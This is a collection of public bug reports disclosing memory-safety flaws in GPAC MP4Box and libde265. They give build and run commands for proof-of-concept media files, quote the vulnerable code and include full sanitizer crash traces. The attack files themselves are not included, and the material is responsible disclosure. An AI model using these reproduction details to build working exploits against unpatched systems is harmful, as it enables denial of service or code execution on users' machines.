GPAC MP4box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to Buffer Overflow in gf_bs_read_data

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

stack-buffer-overflow utils/bitstream.c:732 in gf\_bs\_read\_data

**Version info**

latest version atm

    MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -cat poc_bof11.mp4
    

Crash reported by sanitizer

    Track Importing AAC  - SampleRate 88200 Num Channels 8
    =================================================================
    ==325854==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc52ec0940 at pc 0x7fa1e477c501 bp 0x7ffc52ebf3a0 sp 0x7ffc52ebf390
    WRITE of size 1 at 0x7ffc52ec0940 thread T0
        #0 0x7fa1e477c500 in gf_bs_read_data utils/bitstream.c:732
        #1 0x7fa1e59d0a8c in latm_dmx_sync_frame_bs filters/reframe_latm.c:170
        #2 0x7fa1e59d289f in latm_dmx_sync_frame_bs filters/reframe_latm.c:86
        #3 0x7fa1e59d289f in latm_dmx_process filters/reframe_latm.c:526
        #4 0x7fa1e55eabac in gf_filter_process_task filter_core/filter.c:2795
        #5 0x7fa1e55aa703 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #6 0x7fa1e55b700e in gf_fs_run filter_core/filter_session.c:2120
        #7 0x7fa1e4ff9a21 in gf_media_import media_tools/media_import.c:1551
        #8 0x55a84c1ccb4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #9 0x55a84c1d75d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #10 0x55a84c181130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #11 0x55a84c181130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #12 0x7fa1e2580d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #13 0x7fa1e2580e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #14 0x55a84c15dcb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
    
    Address 0x7ffc52ec0940 is located in stack of thread T0 at offset 5088 in frame
        #0 0x7fa1e59d20af in latm_dmx_process filters/reframe_latm.c:456
    
      This frame has 19 object(s):
        [48, 52) 'pck_size' (line 461)
        [64, 68) 'latm_frame_size' (line 525)
        [80, 84) 'dsi_s' (line 312)
        [96, 104) 'output' (line 460)
        [128, 136) 'dsi_b' (line 311)
        [160, 184) '<unknown>'
        [224, 248) '<unknown>'
        [288, 312) '<unknown>'
        [352, 376) '<unknown>'
        [416, 440) '<unknown>'
        [480, 504) '<unknown>'
        [544, 568) '<unknown>'
        [608, 632) '<unknown>'
        [672, 696) '<unknown>'
        [736, 760) '<unknown>'
        [800, 824) '<unknown>'
        [864, 888) '<unknown>'
        [928, 952) '<unknown>'
        [992, 5088) 'latm_buffer' (line 524) <== Memory access at offset 5088 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow utils/bitstream.c:732 in gf_bs_read_data
    Shadow bytes around the buggy address:
      0x10000a5d00d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d00e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d00f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10000a5d0120: 00 00 00 00 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3
      0x10000a5d0130: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
      0x10000a5d0140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==325854==ABORTING
    

**POC**

poc\_bof11.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47659: stack-buffer-overflow utils/bitstream.c:732 in gf_bs_read_data · Issue #2354 · gpac/gpac

GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 is vulnerable to Buffer Overflow via media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels,

**Description**

heap-buffer-overflow media\_tools/av\_parsers.c:4988 in gf\_media\_nalu\_add\_emulation\_bytes

**Version info**

latest version atm

    MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -catx poc_bof14.mp4
    

Crash reported by sanitizer

    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message type 71 size error (71 but 27 remain), keeping full SEI untouched
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message has less than 2 bytes remaining but no end of sei found
    =================================================================
    ==745696==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x615000014780 at pc 0x7f373f26d683 bp 0x7ffd5a01c290 sp 0x7ffd5a01c280
    WRITE of size 1 at 0x615000014780 thread T0
        #0 0x7f373f26d682 in gf_media_nalu_add_emulation_bytes media_tools/av_parsers.c:4988
        #1 0x7f373f26d682 in gf_avc_reformat_sei media_tools/av_parsers.c:6355
        #2 0x7f373fccee25 in naludmx_push_prefix filters/reframe_nalu.c:2398
        #3 0x7f373fcee8ac in naludmx_parse_nal_avc filters/reframe_nalu.c:2821
        #4 0x7f373fcee8ac in naludmx_process filters/reframe_nalu.c:3333
        #5 0x7f373f8a5f1d in gf_filter_process_task filter_core/filter.c:2815
        #6 0x7f373f8655a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #7 0x7f373f871ece in gf_fs_run filter_core/filter_session.c:2120
        #8 0x7f373f2b49c1 in gf_media_import media_tools/media_import.c:1551
        #9 0x55b1ec0f1b4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #10 0x55b1ec0fc5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #11 0x55b1ec0a6130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #12 0x55b1ec0a6130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #13 0x7f373c83bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #14 0x7f373c83be3f in __libc_start_main_impl ../csu/libc-start.c:392
        #15 0x55b1ec082cb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
    
    0x615000014780 is located 0 bytes to the right of 512-byte region [0x615000014580,0x615000014780)
    allocated by thread T0 here:
        #0 0x7f37423a4867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
        #1 0x7f373ea2c72a in gf_bs_new utils/bitstream.c:154
        #2 0x7f373f26c993 in gf_avc_reformat_sei media_tools/av_parsers.c:6227
        #3 0x7f373fccee25 in naludmx_push_prefix filters/reframe_nalu.c:2398
        #4 0x7f373fcee8ac in naludmx_parse_nal_avc filters/reframe_nalu.c:2821
        #5 0x7f373fcee8ac in naludmx_process filters/reframe_nalu.c:3333
        #6 0x7f373f8a5f1d in gf_filter_process_task filter_core/filter.c:2815
        #7 0x7f373f8655a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #8 0x7f373f871ece in gf_fs_run filter_core/filter_session.c:2120
        #9 0x7f373f2b49c1 in gf_media_import media_tools/media_import.c:1551
        #10 0x55b1ec0f1b4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #11 0x55b1ec0fc5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #12 0x55b1ec0a6130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #13 0x55b1ec0a6130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #14 0x7f373c83bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes
    Shadow bytes around the buggy address:
      0x0c2a7fffa8a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa8b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fffa8c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fffa8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fffa8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c2a7fffa8f0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==745696==ABORTING
    

if compile without ASAN and run the same poc

    ./configure --static-bin
    make
    ./MP4Box import -catx poc_bof14.mp4
    

The crash will happen at another place

    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message type 71 size error (71 but 27 remain), keeping full SEI untouched
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message has less than 2 bytes remaining but no end of sei found
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 16962257
    [AVC|H264] Error parsing NAL unit type 7
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message type 16 size error (45 but 7 remain), keeping full SEI untouched
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 32527
    [AVC|H264] Error parsing NAL unit type 7
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 16964897
    [AVC|H264] Error parsing NAL unit type 7
    [avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team!
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 63
    [AVC|H264] Error parsing NAL unit type 7
    [avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team!
    realloc(): invalid next size
    Aborted
    

realloc(): invalid next size indicates that there was a bof on heap indeed, overwriting the size field of a heap chunk.

**POC**

poc\_bof14.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47661: heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes · Issue #2358 · gpac/gpac

GPAC MP4box 2.1-DEV-rev593-g007bf61a0 is vulnerable to Buffer Overflow in eac3_update_channels function of media_tools/av_parsers.c:9113

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in eac3\_update\_channels function of media\_tools/av\_parsers.c:9113

static void eac3\_update\_channels(GF\_AC3Config \*hdr)
{
	u32 i;
	for (i=0; i<hdr->nb\_streams; i++) {
		u32 nb\_ch = ac3\_mod\_to\_total\_chans\[hdr->streams\[i\].acmod\]; // overflow
		if (hdr->streams\[i\].nb\_dep\_sub) {
			hdr->streams\[i\].chan\_loc = eac3\_chanmap\_to\_chan\_loc(hdr->streams\[i\].chan\_loc);
			nb\_ch += gf\_eac3\_get\_chan\_loc\_count(hdr->streams\[i\].chan\_loc);
		}
		if (hdr->streams\[i\].lfon) nb\_ch++;
		hdr->streams\[i\].channels = nb\_ch;
		hdr->streams\[i\].surround\_channels = ac3\_mod\_to\_surround\_chans\[hdr->streams\[i\].acmod\];
	}
}

**Version info**

latest version

    MP4Box - GPAC version 2.1-DEV-rev593-g007bf61a0-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof7.swf
    

Crash reported by sanitizer

    [iso file] Unknown box type dvbs in parent stsd
    Track Importing EAC-3 - SampleRate 32000 Num Channels 6
    [AC3Dmx] 24 bytes unrecovered before sync word
    [AC3Dmx] 13 bytes unrecovered before sync word
    media_tools/av_parsers.c:9113:50: runtime error: index 8 out of bounds for type 'GF_AC3StreamInfo [8]'
    

**POC**

poc\_bof7.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47653: buffer overflow in eac3_update_channels function of media_tools/av_parsers.c:9113 · Issue #2349 · gpac/gpac

GPAC MP4box 2.1-DEV-rev593-g007bf61a0 is vulnerable to Buffer Overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8261

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in gf\_hevc\_read\_sps\_bs\_internal function of media\_tools/av\_parsers.c:8261

	//sps\_rep\_format\_idx = 0;
	if (multiLayerExtSpsFlag) {
		sps->update\_rep\_format\_flag = gf\_bs\_read\_int\_log(bs, 1, "update\_rep\_format\_flag");
		if (sps->update\_rep\_format\_flag) {
			sps->rep\_format\_idx = gf\_bs\_read\_int\_log(bs, 8, "rep\_format\_idx");
			if (sps->rep\_format\_idx\>15) {
				return -1;
			}
		} else {
			sps->rep\_format\_idx = vps->rep\_format\_idx\[layer\_id\]; // overflow
		}

**Version info**

latest version

    MP4Box - GPAC version 2.1-DEV-rev593-g007bf61a0-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof8.mov
    

Crash reported by sanitizer

    [iso file] Unknown box type dvbs in parent stsd
    [HEVC] Error parsing NAL unit type 16
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 32
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing NAL unit type 16
    Track Importing HEVC - Width -10 Height -20316159 FPS 25000/1000
    [HEVC] Error parsing NAL Unit 8 (size 0 type 0 frame 0 last POC 0) - skipping
    [HEVC] Error parsing NAL unit type 16
    [HEVC] Error parsing NAL unit type 0
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 32
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 33
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 34
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Wrong number of layer sets in VPS 5
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Error parsing Video Param Set
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 32
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 33
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 34
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 34
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] sorry, 11 layers in VPS but only 4 supported
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Error parsing Video Param Set
    media_tools/av_parsers.c:8261:45: runtime error: index 45 out of bounds for type 'u32 [16]'
    

**POC**

poc\_bof8.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47654: buffer overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8261 · Issue #2350 · gpac/gpac

Libde265 1.0.9 is vulnerable to Buffer Overflow in function void put_qpel_fallback<unsigned short>

**Description**

stack-buffer-overflow (libde265/build/libde265/libde265.so+0x17d304) in void put\_qpel\_fallback(short\*, long, unsigned short const\*, long, int, int, short\*, int, int, int)

**Version info**

     dec265  v1.0.9
    --------------
    usage: dec265 [options] videofile.bin
    The video file must be a raw bitstream, or a stream with NAL units (option -n).
    
    options:
      -q, --quiet       do not show decoded image
      -t, --threads N   set number of worker threads (0 - no threading)
      -c, --check-hash  perform hash check
      -n, --nal         input is a stream with 4-byte length prefixed NAL units
      -f, --frames N    set number of frames to process
      -o, --output      write YUV reconstruction
      -d, --dump        dump headers
      -0, --noaccel     do not use any accelerated code (SSE)
      -v, --verbose     increase verbosity level (up to 3 times)
      -L, --no-logging  disable logging
      -B, --write-bytestream FILENAME  write raw bytestream (from NAL input)
      -m, --measure YUV compute PSNRs relative to reference YUV
      -T, --highest-TID select highest temporal sublayer to decode
          --disable-deblocking   disable deblocking filter
          --disable-sao          disable sample-adaptive offset filter
      -h, --help        show help
    

**Reproduce**

    git clone https://github.com/strukturag/libde265.git
    cd libde265
    mkdir build
    cd build
    cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address"
    make -j$(nproc)
    ./dec265/dec265 poc.bin
    

**ASAN**

    WARNING: coded parameter out of range
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: non-existing PPS referenced
    =================================================================
    ==3829==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffea52d35f at pc 0x7f8966bd5305 bp 0x7fffea52ac00 sp 0x7fffea52abf0
    READ of size 2 at 0x7fffea52d35f thread T0
        #0 0x7f8966bd5304 in void put_qpel_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, short*, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x17d304)
        #1 0x7f8966bd08c2 in put_qpel_1_0_fallback_16(short*, long, unsigned short const*, long, int, int, short*, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1788c2)
        #2 0x7f8966c0152e in acceleration_functions::put_hevc_qpel(short*, long, void const*, long, int, int, short*, int, int, int) const (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a952e)
        #3 0x7f8966c02c0f in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1aac0f)
        #4 0x7f8966bf3a8b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x19ba8b)
        #5 0x7f8966c00a2e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a8a2e)
        #6 0x7f8966c3dd2a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e5d2a)
        #7 0x7f8966c3f774 in read_coding_unit(thread_context*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e7774)
        #8 0x7f8966c40762 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8762)
        #9 0x7f8966c405a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3)
        #10 0x7f8966c405a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3)
        #11 0x7f8966c405a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3)
        #12 0x7f8966c37d49 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfd49)
        #13 0x7f8966c40f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06)
        #14 0x7f8966c42c3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f)
        #15 0x7f8966b95e6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f)
        #16 0x7f8966b96673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673)
        #17 0x7f8966b95311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311)
        #18 0x7f8966b9505b in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d05b)
        #19 0x7f8966b97be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
        #20 0x7f8966b9824c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
        #21 0x7f8966b7e3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #22 0x562ac9c989a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #23 0x7f8966526d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #24 0x7f8966526e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #25 0x562ac9c967c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4)
    
    Address 0x7fffea52d35f is located in stack of thread T0 at offset 9391 in frame
        #0 0x7f8966c02203 in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1aa203)
    
      This frame has 2 object(s):
        [48, 9136) 'mcbuffer' (line 71)
        [9392, 15072) 'padbuf' (line 129) <== Memory access at offset 9391 partially underflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
